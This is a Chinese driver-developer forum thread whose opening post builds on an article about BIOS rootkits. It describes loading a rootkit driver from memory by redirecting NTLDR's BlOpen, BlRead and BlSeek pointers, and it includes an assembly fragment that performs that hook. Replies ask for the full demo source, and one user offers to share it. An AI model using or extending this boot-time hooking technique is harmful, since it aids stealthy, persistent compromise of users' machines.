mrchenlei
驱动牛犊
驱动牛犊
  • 注册日期2007-05-28
  • 最后登录2012-06-12
  • 粉丝0
  • 关注0
  • 积分21分
  • 威望114点
  • 贡献值0点
  • 好评度13点
  • 原创分0分
  • 专家分0分
阅读:4065回复:4

BIOS rootkit的一点补充

楼主#
更多 发布于:2007-06-23 00:52
读了BIOS Rootkit:Welcome home,my Lord!的文章,觉得如何运行一个driver说的很模糊,好像还有点复杂,本人就补充一下这点:
可以直接调用NTLDR的BlLoadDeviceDriver函数,但问题在于该函数是从硬盘上加载driver,但现在rootkit的driver位于内存中,就必须重载NTLDR中访问硬盘的相关函数,它们是:
BlOpen,BlRead,BlSeek函数,在NTLDR中通过一个静态变量FTablAddr来存放这些函数的指针,只要将这些函数指针先指向我们的内存文件访问函数,就能实现内存加载driver.
对各个版本的操作系统,可以用IDA之类找到FTablAddr的地址,然后修改之中的相关指针下面是一段代码:
;saving funAddr:
    mov eax,FTablAddr
    mov ebx,[eax]
    push dword ptr [ebx+8]    ;openFun
    push dword ptr [ebx+12]    ;readFun
    push dword ptr [ebx+20]    ;seekFun
    
    mov eax,MyOpen
    call cntFunAddr    
    mov dword ptr [ebx+8],eax
    
    mov eax,MyRead
    call cntFunAddr    
    mov dword ptr [ebx+12],eax
    
    mov eax,MySeek
    call cntFunAddr    
    mov dword ptr [ebx+20],eax
cheng_5103
驱动牛犊
驱动牛犊
  • 注册日期2003-10-06
  • 最后登录2012-03-21
  • 粉丝0
  • 关注0
  • 积分23分
  • 威望228点
  • 贡献值0点
  • 好评度45点
  • 原创分0分
  • 专家分0分
沙发#
发布于:2008-03-17 20:49
兄台:
   能否把bios rootkit的演示代码..发份给我..
cheng_5103@126.com
cheng_5103@sohu.com
先谢过了..我很想看下哈!!
cheng
dlf2008
驱动牛犊
驱动牛犊
  • 注册日期2008-10-26
  • 最后登录2008-11-05
  • 粉丝0
  • 关注0
  • 积分1分
  • 威望2点
  • 贡献值0点
  • 好评度0点
  • 原创分0分
  • 专家分0分
板凳#
发布于:2008-10-27 09:59
你好,能否发一份你的程序给我,
我想学习学习
先谢谢你了
我的邮箱是:122433468@qq.com
LOIEN
驱动牛犊
驱动牛犊
  • 注册日期2007-12-20
  • 最后登录2009-10-18
  • 粉丝0
  • 关注0
  • 积分13分
  • 威望61点
  • 贡献值0点
  • 好评度2点
  • 原创分0分
  • 专家分0分
地板#
发布于:2008-10-27 11:10
呃,刚看见给我也发一份吧
dayed.hell@gmail.com
驱网无线,快乐无限
ydfivy
驱动牛犊
驱动牛犊
  • 注册日期2010-03-15
  • 最后登录2023-10-13
  • 粉丝0
  • 关注1
  • 积分3分
  • 威望31点
  • 贡献值0点
  • 好评度0点
  • 原创分0分
  • 专家分0分
  • 社区居民
地下室#
发布于:2010-05-04 21:12
我有这个源码。想要代码的加我108017820
游客

返回顶部